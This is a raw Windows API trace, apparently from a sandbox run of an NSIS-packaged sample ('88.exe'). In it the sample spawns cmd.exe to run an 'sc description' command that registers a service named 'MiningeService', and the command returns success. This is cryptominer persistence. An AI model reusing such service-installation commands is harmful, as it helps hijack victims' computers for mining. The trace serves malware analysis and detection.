(lpModuleName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll") returned 0x0 [0275.545] LoadLibraryExA (lpLibFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll", hFile=0x0, dwFlags=0x8) returned 0x2d70000 [0275.548] GetProcAddress (hModule=0x2d70000, lpProcName="ExecToLog") returned 0x2d7102d [0275.548] GetModuleHandleA (lpModuleName="kernel32") returned 0x769b0000 [0275.548] GetProcAddress (hModule=0x769b0000, lpProcName="IsWow64Process") returned 0x769c193e [0275.548] GetCurrentProcess () returned 0xffffffff [0275.548] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2d6fb40 | out: Wow64Process=0x2d6fb40*=1) returned 1 [0275.548] FindWindowExA (hWndParent=0x401e4, hWndChildAfter=0x0, lpszClass="#32770", lpszWindow=0x0) returned 0x40300 [0275.549] FindWindowExA (hWndParent=0x40300, hWndChildAfter=0x0, lpszClass="SysListView32", lpszWindow=0x0) returned 0x302f8 [0275.549] lstrcpyA (in: lpString1=0x2aec30, lpString2="/OEM" | out: lpString1="/OEM") returned="/OEM" [0275.549] lstrlenA (lpString="/TIMEOUT=") returned 9 [0275.550] lstrlenA (lpString="/OEM") returned 4 [0275.550] lstrcmpiA (lpString1="/OEM", lpString2="/OEM") returned 0 [0275.550] lstrcpyA (in: lpString1=0x2aec30, lpString2="C:\\Windows\\system32\\cmd.exe /C sc description MiningeService ServiceManagerForMiner" | out: lpString1="C:\\Windows\\system32\\cmd.exe /C sc description MiningeService ServiceManagerForMiner") returned="C:\\Windows\\system32\\cmd.exe /C sc description MiningeService ServiceManagerForMiner" [0275.550] lstrlenA (lpString="/TIMEOUT=") returned 9 [0275.550] lstrlenA (lpString="C:\\Windows\\system32\\cmd.exe /C sc description MiningeService ServiceManagerForMiner") returned 83 [0275.550] lstrcmpiA (lpString1="C:\\Window", lpString2="/TIMEOUT=") returned 1 [0275.551] lstrlenA (lpString=":\\Windows\\system32\\cmd.exe /C sc description MiningeService ServiceManagerForMiner") returned 82 [0275.551] lstrcmpiA (lpString1=":\\Windows", lpString2="/TIMEOUT=") returned 1 [0275.551] lstrlenA (lpString="\\Windows\\system32\\cmd.exe /C sc description MiningeService ServiceManagerForMiner") returned 81 [0275.551] lstrcmpiA (lpString1="\\Windows\\", lpString2="/TIMEOUT=") returned 1 [0275.552] lstrlenA (lpString="Windows\\system32\\cmd.exe /C sc description MiningeService ServiceManagerForMiner") returned 80 [0275.552] lstrcmpiA (lpString1="Windows\\s", lpString2="/TIMEOUT=") returned 1 [0275.552] lstrlenA (lpString="indows\\system32\\cmd.exe /C sc description MiningeService ServiceManagerForMiner") returned 79 [0275.552] lstrcmpiA (lpString1="indows\\sy", lpString2="/TIMEOUT=") returned 1 [0275.552] lstrlenA (lpString="ndows\\system32\\cmd.exe /C sc description MiningeService ServiceManagerForMiner") returned 78 [0275.552] lstrcmpiA (lpString1="ndows\\sys", lpString2="/TIMEOUT=") returned 1 [0275.553] lstrlenA (lpString="dows\\system32\\cmd.exe /C sc description MiningeService ServiceManagerForMiner") returned 77 [0275.553] lstrcmpiA (lpString1="dows\\syst", lpString2="/TIMEOUT=") returned 1 [0275.553] lstrlenA (lpString="ows\\system32\\cmd.exe /C sc description MiningeService ServiceManagerForMiner") returned 76 [0275.553] lstrcmpiA (lpString1="ows\\syste", lpString2="/TIMEOUT=") returned 1 [0275.553] lstrlenA (lpString="ws\\system32\\cmd.exe /C sc description MiningeService ServiceManagerForMiner") returned 75 [0275.553] lstrcmpiA (lpString1="ws\\system", lpString2="/TIMEOUT=") returned 1 [0275.553] lstrlenA (lpString="s\\system32\\cmd.exe /C sc description MiningeService ServiceManagerForMiner") returned 74 [0275.553] lstrcmpiA (lpString1="s\\system3", lpString2="/TIMEOUT=") returned 1 [0275.554] lstrlenA (lpString="\\system32\\cmd.exe /C sc description MiningeService ServiceManagerForMiner") returned 73 [0275.554] lstrcmpiA (lpString1="\\system32", lpString2="/TIMEOUT=") returned 1 [0275.554] lstrlenA (lpString="system32\\cmd.exe /C sc description MiningeService ServiceManagerForMiner") returned 72 [0275.554] lstrcmpiA (lpString1="system32\\", lpString2="/TIMEOUT=") returned 1 [0275.554] lstrlenA (lpString="ystem32\\cmd.exe /C sc description MiningeService ServiceManagerForMiner") returned 71 [0275.554] lstrcmpiA (lpString1="ystem32\\c", lpString2="/TIMEOUT=") returned 1 [0275.555] lstrlenA (lpString="stem32\\cmd.exe /C sc description MiningeService ServiceManagerForMiner") returned 70 [0275.555] lstrcmpiA (lpString1="stem32\\cm", lpString2="/TIMEOUT=") returned 1 [0275.555] lstrlenA (lpString="tem32\\cmd.exe /C sc description MiningeService ServiceManagerForMiner") returned 69 [0275.555] lstrcmpiA (lpString1="tem32\\cmd", lpString2="/TIMEOUT=") returned 1 [0275.555] lstrlenA (lpString="em32\\cmd.exe /C sc description MiningeService ServiceManagerForMiner") returned 68 [0275.555] lstrcmpiA (lpString1="em32\\cmd.", lpString2="/TIMEOUT=") returned 1 [0275.555] lstrlenA (lpString="m32\\cmd.exe /C sc description MiningeService ServiceManagerForMiner") returned 67 [0275.555] lstrcmpiA (lpString1="m32\\cmd.e", lpString2="/TIMEOUT=") returned 1 [0275.556] lstrlenA (lpString="32\\cmd.exe /C sc description MiningeService ServiceManagerForMiner") returned 66 [0275.556] lstrcmpiA (lpString1="32\\cmd.ex", lpString2="/TIMEOUT=") returned 1 [0275.556] lstrlenA (lpString="2\\cmd.exe /C sc description MiningeService ServiceManagerForMiner") returned 65 [0275.556] lstrcmpiA (lpString1="2\\cmd.exe", lpString2="/TIMEOUT=") returned 1 [0275.556] lstrlenA (lpString="\\cmd.exe /C sc description MiningeService ServiceManagerForMiner") returned 64 [0275.556] lstrcmpiA (lpString1="\\cmd.exe ", lpString2="/TIMEOUT=") returned 1 [0275.557] lstrlenA (lpString="cmd.exe /C sc description MiningeService ServiceManagerForMiner") returned 63 [0275.557] lstrcmpiA (lpString1="cmd.exe /", lpString2="/TIMEOUT=") returned 1 [0275.557] lstrlenA (lpString="md.exe /C sc description MiningeService ServiceManagerForMiner") returned 62 [0275.557] lstrcmpiA (lpString1="md.exe /C", lpString2="/TIMEOUT=") returned 1 [0275.557] lstrlenA (lpString="d.exe /C sc description MiningeService ServiceManagerForMiner") returned 61 [0275.557] lstrcmpiA (lpString1="d.exe /C ", lpString2="/TIMEOUT=") returned 1 [0275.557] lstrlenA (lpString=".exe /C sc description MiningeService ServiceManagerForMiner") returned 60 [0275.558] lstrcmpiA (lpString1=".exe /C s", lpString2="/TIMEOUT=") returned -1 [0275.558] lstrlenA (lpString="exe /C sc description MiningeService ServiceManagerForMiner") returned 59 [0275.558] lstrcmpiA (lpString1="exe /C sc", lpString2="/TIMEOUT=") returned 1 [0275.558] lstrlenA (lpString="xe /C sc description MiningeService ServiceManagerForMiner") returned 58 [0275.558] lstrcmpiA (lpString1="xe /C sc ", lpString2="/TIMEOUT=") returned 1 [0275.558] lstrlenA (lpString="e /C sc description MiningeService ServiceManagerForMiner") returned 57 [0275.558] lstrcmpiA (lpString1="e /C sc d", lpString2="/TIMEOUT=") returned 1 [0275.559] lstrlenA (lpString=" /C sc description MiningeService ServiceManagerForMiner") returned 56 [0275.559] lstrcmpiA (lpString1=" /C sc de", lpString2="/TIMEOUT=") returned -1 [0275.559] lstrlenA (lpString="/C sc description MiningeService ServiceManagerForMiner") returned 55 [0275.559] lstrcmpiA (lpString1="/C sc des", lpString2="/TIMEOUT=") returned -1 [0275.559] lstrlenA (lpString="C sc description MiningeService ServiceManagerForMiner") returned 54 [0275.559] lstrcmpiA (lpString1="C sc desc", lpString2="/TIMEOUT=") returned 1 [0275.559] lstrlenA (lpString=" sc description MiningeService ServiceManagerForMiner") returned 53 [0275.559] lstrcmpiA (lpString1=" sc descr", lpString2="/TIMEOUT=") returned -1 [0275.560] lstrlenA (lpString="sc description MiningeService ServiceManagerForMiner") returned 52 [0275.560] lstrcmpiA (lpString1="sc descri", lpString2="/TIMEOUT=") returned 1 [0275.560] lstrlenA (lpString="c description MiningeService ServiceManagerForMiner") returned 51 [0275.560] lstrcmpiA (lpString1="c descrip", lpString2="/TIMEOUT=") returned 1 [0275.560] lstrlenA (lpString=" description MiningeService ServiceManagerForMiner") returned 50 [0275.560] lstrcmpiA (lpString1=" descript", lpString2="/TIMEOUT=") returned -1 [0275.561] lstrlenA (lpString="description MiningeService ServiceManagerForMiner") returned 49 [0275.561] lstrcmpiA (lpString1="descripti", lpString2="/TIMEOUT=") returned 1 [0275.561] lstrlenA (lpString="escription MiningeService ServiceManagerForMiner") returned 48 [0275.561] lstrcmpiA (lpString1="escriptio", lpString2="/TIMEOUT=") returned 1 [0275.561] lstrlenA (lpString="scription MiningeService ServiceManagerForMiner") returned 47 [0275.561] lstrcmpiA (lpString1="scription", lpString2="/TIMEOUT=") returned 1 [0275.561] lstrlenA (lpString="cription MiningeService ServiceManagerForMiner") returned 46 [0275.561] lstrcmpiA (lpString1="cription ", lpString2="/TIMEOUT=") returned 1 [0275.562] lstrlenA (lpString="ription MiningeService ServiceManagerForMiner") returned 45 [0275.562] lstrcmpiA (lpString1="ription M", lpString2="/TIMEOUT=") returned 1 [0275.562] lstrlenA (lpString="iption MiningeService ServiceManagerForMiner") returned 44 [0275.562] lstrcmpiA (lpString1="iption Mi", lpString2="/TIMEOUT=") returned 1 [0275.562] lstrlenA (lpString="ption MiningeService ServiceManagerForMiner") returned 43 [0275.562] lstrcmpiA (lpString1="ption Min", lpString2="/TIMEOUT=") returned 1 [0275.563] lstrlenA (lpString="tion MiningeService ServiceManagerForMiner") returned 42 [0275.563] lstrcmpiA (lpString1="tion Mini", lpString2="/TIMEOUT=") returned 1 [0275.563] lstrlenA (lpString="ion MiningeService ServiceManagerForMiner") returned 41 [0275.563] lstrcmpiA (lpString1="ion Minin", lpString2="/TIMEOUT=") returned 1 [0275.563] lstrlenA (lpString="on MiningeService ServiceManagerForMiner") returned 40 [0275.563] lstrcmpiA (lpString1="on Mining", lpString2="/TIMEOUT=") returned 1 [0275.564] lstrlenA (lpString="n MiningeService ServiceManagerForMiner") returned 39 [0275.564] lstrcmpiA (lpString1="n Mininge", lpString2="/TIMEOUT=") returned 1 [0275.564] lstrlenA (lpString=" MiningeService ServiceManagerForMiner") returned 38 [0275.564] lstrcmpiA (lpString1=" MiningeS", lpString2="/TIMEOUT=") returned -1 [0275.564] lstrlenA (lpString="MiningeService ServiceManagerForMiner") returned 37 [0275.564] lstrcmpiA (lpString1="MiningeSe", lpString2="/TIMEOUT=") returned 1 [0275.564] lstrlenA (lpString="iningeService ServiceManagerForMiner") returned 36 [0275.564] lstrcmpiA (lpString1="iningeSer", lpString2="/TIMEOUT=") returned 1 [0275.565] lstrlenA (lpString="ningeService ServiceManagerForMiner") returned 35 [0275.565] lstrcmpiA (lpString1="ningeServ", lpString2="/TIMEOUT=") returned 1 [0275.565] lstrlenA (lpString="ingeService ServiceManagerForMiner") returned 34 [0275.565] lstrcmpiA (lpString1="ingeServi", lpString2="/TIMEOUT=") returned 1 [0275.566] lstrlenA (lpString="ngeService ServiceManagerForMiner") returned 33 [0275.566] lstrcmpiA (lpString1="ngeServic", lpString2="/TIMEOUT=") returned 1 [0275.566] lstrlenA (lpString="geService ServiceManagerForMiner") returned 32 [0275.566] lstrcmpiA (lpString1="geService", lpString2="/TIMEOUT=") returned 1 [0275.566] lstrlenA (lpString="eService ServiceManagerForMiner") returned 31 [0275.566] lstrcmpiA (lpString1="eService ", lpString2="/TIMEOUT=") returned 1 [0275.566] lstrlenA (lpString="Service ServiceManagerForMiner") returned 30 [0275.567] lstrcmpiA (lpString1="Service S", lpString2="/TIMEOUT=") returned 1 [0275.567] lstrlenA (lpString="ervice ServiceManagerForMiner") returned 29 [0275.567] lstrcmpiA (lpString1="ervice Se", lpString2="/TIMEOUT=") returned 1 [0275.567] lstrlenA (lpString="rvice ServiceManagerForMiner") returned 28 [0275.567] lstrcmpiA (lpString1="rvice Ser", lpString2="/TIMEOUT=") returned 1 [0275.567] lstrlenA (lpString="vice ServiceManagerForMiner") returned 27 [0275.567] lstrcmpiA (lpString1="vice Serv", lpString2="/TIMEOUT=") returned 1 [0275.568] lstrlenA (lpString="ice ServiceManagerForMiner") returned 26 [0275.568] lstrcmpiA (lpString1="ice Servi", lpString2="/TIMEOUT=") returned 1 [0275.568] lstrlenA (lpString="ce ServiceManagerForMiner") returned 25 [0275.568] lstrcmpiA (lpString1="ce Servic", lpString2="/TIMEOUT=") returned 1 [0275.568] lstrlenA (lpString="e ServiceManagerForMiner") returned 24 [0275.568] lstrcmpiA (lpString1="e Service", lpString2="/TIMEOUT=") returned 1 [0275.569] lstrlenA (lpString=" ServiceManagerForMiner") returned 23 [0275.569] lstrcmpiA (lpString1=" ServiceM", lpString2="/TIMEOUT=") returned -1 [0275.569] lstrlenA (lpString="ServiceManagerForMiner") returned 22 [0275.569] lstrcmpiA (lpString1="ServiceMa", lpString2="/TIMEOUT=") returned 1 [0275.569] lstrlenA (lpString="erviceManagerForMiner") returned 21 [0275.569] lstrcmpiA (lpString1="erviceMan", lpString2="/TIMEOUT=") returned 1 [0275.569] lstrlenA (lpString="rviceManagerForMiner") returned 20 [0275.569] lstrcmpiA (lpString1="rviceMana", lpString2="/TIMEOUT=") returned 1 [0275.570] lstrlenA (lpString="viceManagerForMiner") returned 19 [0275.570] lstrcmpiA (lpString1="viceManag", lpString2="/TIMEOUT=") returned 1 [0275.570] lstrlenA (lpString="iceManagerForMiner") returned 18 [0275.570] lstrcmpiA (lpString1="iceManage", lpString2="/TIMEOUT=") returned 1 [0275.570] lstrlenA (lpString="ceManagerForMiner") returned 17 [0275.570] lstrcmpiA (lpString1="ceManager", lpString2="/TIMEOUT=") returned 1 [0275.571] lstrlenA (lpString="eManagerForMiner") returned 16 [0275.571] lstrcmpiA (lpString1="eManagerF", lpString2="/TIMEOUT=") returned 1 [0275.571] lstrlenA (lpString="ManagerForMiner") returned 15 [0275.571] lstrcmpiA (lpString1="ManagerFo", lpString2="/TIMEOUT=") returned 1 [0275.572] lstrlenA (lpString="anagerForMiner") returned 14 [0275.572] lstrcmpiA (lpString1="anagerFor", lpString2="/TIMEOUT=") returned 1 [0275.572] lstrlenA (lpString="nagerForMiner") returned 13 [0275.572] lstrcmpiA (lpString1="nagerForM", lpString2="/TIMEOUT=") returned 1 [0275.572] lstrlenA (lpString="agerForMiner") returned 12 [0275.572] lstrcmpiA (lpString1="agerForMi", lpString2="/TIMEOUT=") returned 1 [0275.573] lstrlenA (lpString="gerForMiner") returned 11 [0275.573] lstrcmpiA (lpString1="gerForMin", lpString2="/TIMEOUT=") returned 1 [0275.573] lstrlenA (lpString="erForMiner") returned 10 [0275.573] lstrcmpiA (lpString1="erForMine", lpString2="/TIMEOUT=") returned 1 [0275.573] lstrlenA (lpString="rForMiner") returned 9 [0275.573] lstrcmpiA (lpString1="rForMiner", lpString2="/TIMEOUT=") returned 1 [0275.574] lstrlenA (lpString="ForMiner") returned 8 [0275.574] lstrcmpiA (lpString1="C:\\Windows\\system32\\cmd.exe /C sc description MiningeService ServiceManagerForMiner", lpString2="/OEM") returned 1 [0275.574] GetVersion () returned 0x1db10106 [0275.574] GlobalLock (hMem=0x224003c) returned 0x2af040 [0275.574] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x2d6fd20, dwRevision=0x1 | out: pSecurityDescriptor=0x2d6fd20) returned 1 [0275.574] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x2d6fd20, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x2d6fd20) returned 1 [0275.574] CreatePipe (in: hReadPipe=0x2d6fd74, hWritePipe=0x2d6fd68, lpPipeAttributes=0x2d6fd44, nSize=0x0 | out: hReadPipe=0x2d6fd74*=0x210, hWritePipe=0x2d6fd68*=0x214) returned 1 [0275.574] CreatePipe (in: hReadPipe=0x2d6fd58, hWritePipe=0x2d6fd6c, lpPipeAttributes=0x2d6fd44, nSize=0x0 | out: hReadPipe=0x2d6fd58*=0x1c, hWritePipe=0x2d6fd6c*=0x20c) returned 1 [0275.574] GetStartupInfoA (in: lpStartupInfo=0x2d6fcdc | out: lpStartupInfo=0x2d6fcdc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0275.575] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\cmd.exe /C sc description MiningeService ServiceManagerForMiner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x10, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2d6fcdc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x20c, hStdOutput=0x214, hStdError=0x214), lpProcessInformation=0x2d6fd34 | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /C sc description MiningeService ServiceManagerForMiner", lpProcessInformation=0x2d6fd34*(hProcess=0x218, hThread=0x21c, dwProcessId=0xa68, dwThreadId=0xa6c)) returned 1 [0275.584] GetTickCount () returned 0x1d61d45 [0275.584] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0275.584] Sleep (dwMilliseconds=0x64) [0275.690] WaitForSingleObject (hHandle=0x218, dwMilliseconds=0x0) returned 0x102 [0275.690] GetExitCodeProcess (in: hProcess=0x218, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0275.690] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0275.690] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0275.690] Sleep (dwMilliseconds=0x64) [0275.799] WaitForSingleObject (hHandle=0x218, dwMilliseconds=0x0) returned 0x102 [0275.799] GetExitCodeProcess (in: hProcess=0x218, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0275.799] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0275.799] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0275.800] Sleep (dwMilliseconds=0x64) [0275.909] WaitForSingleObject (hHandle=0x218, dwMilliseconds=0x0) returned 0x102 [0275.909] GetExitCodeProcess (in: hProcess=0x218, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0275.909] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0275.909] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0275.909] Sleep (dwMilliseconds=0x64) [0276.018] WaitForSingleObject (hHandle=0x218, dwMilliseconds=0x0) returned 0x102 [0276.018] GetExitCodeProcess (in: hProcess=0x218, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0276.018] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0276.018] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0276.018] Sleep (dwMilliseconds=0x64) [0276.206] WaitForSingleObject (hHandle=0x218, dwMilliseconds=0x0) returned 0x102 [0276.206] GetExitCodeProcess (in: hProcess=0x218, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0276.206] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0276.206] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0276.206] Sleep (dwMilliseconds=0x64) [0276.330] WaitForSingleObject (hHandle=0x218, dwMilliseconds=0x0) returned 0x102 [0276.330] GetExitCodeProcess (in: hProcess=0x218, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0276.330] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0276.330] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0276.330] Sleep (dwMilliseconds=0x64) [0276.507] WaitForSingleObject (hHandle=0x218, dwMilliseconds=0x0) returned 0x102 [0276.507] GetExitCodeProcess (in: hProcess=0x218, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0276.507] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0276.507] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0276.507] Sleep (dwMilliseconds=0x64) [0276.666] WaitForSingleObject (hHandle=0x218, dwMilliseconds=0x0) returned 0x102 [0276.666] GetExitCodeProcess (in: hProcess=0x218, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0276.666] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0276.666] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0276.666] Sleep (dwMilliseconds=0x64) [0276.767] WaitForSingleObject (hHandle=0x218, dwMilliseconds=0x0) returned 0x102 [0276.767] GetExitCodeProcess (in: hProcess=0x218, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0276.767] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0276.768] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0276.768] Sleep (dwMilliseconds=0x64) [0276.969] WaitForSingleObject (hHandle=0x218, dwMilliseconds=0x0) returned 0x102 [0276.969] GetExitCodeProcess (in: hProcess=0x218, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0276.969] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x23, lpBytesLeftThisMessage=0x0) returned 1 [0276.970] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x23, lpBytesLeftThisMessage=0x0) returned 1 [0276.970] GetTickCount () returned 0x1d62199 [0276.970] ReadFile (in: hFile=0x210, lpBuffer=0x2d73078, nNumberOfBytesToRead=0x3ff, lpNumberOfBytesRead=0x2d6fd7c, lpOverlapped=0x0 | out: lpBuffer=0x2d73078*, lpNumberOfBytesRead=0x2d6fd7c*=0x23, lpOverlapped=0x0) returned 1 [0276.970] lstrlenA (lpString="") returned 0 [0276.970] lstrlenA (lpString="[SC] ChangeServiceConfig2 SUCCESS\r\n") returned 35 [0276.970] GlobalSize (hMem=0x224003c) returned 0x1000 [0276.970] lstrcatA (in: lpString1="", lpString2="[SC] ChangeServiceConfig2 SUCCESS\r\n" | out: lpString1="[SC] ChangeServiceConfig2 SUCCESS\r\n") returned="[SC] ChangeServiceConfig2 SUCCESS\r\n" [0276.970] lstrlenA (lpString="\x09") returned 1 [0276.970] lstrlenA (lpString="[SC] ChangeServiceConfig2 SUCCESS\r\n") returned 35 [0276.970] lstrcmpiA (lpString1="[", lpString2="\x09") returned 1 [0276.971] lstrlenA (lpString="SC] ChangeServiceConfig2 SUCCESS\r\n") returned 34 [0276.971] lstrcmpiA (lpString1="S", lpString2="\x09") returned 1 [0276.971] lstrlenA (lpString="C] ChangeServiceConfig2 SUCCESS\r\n") returned 33 [0276.971] lstrcmpiA (lpString1="C", lpString2="\x09") returned 1 [0276.971] lstrlenA (lpString="] ChangeServiceConfig2 SUCCESS\r\n") returned 32 [0276.972] lstrcmpiA (lpString1="]", lpString2="\x09") returned 1 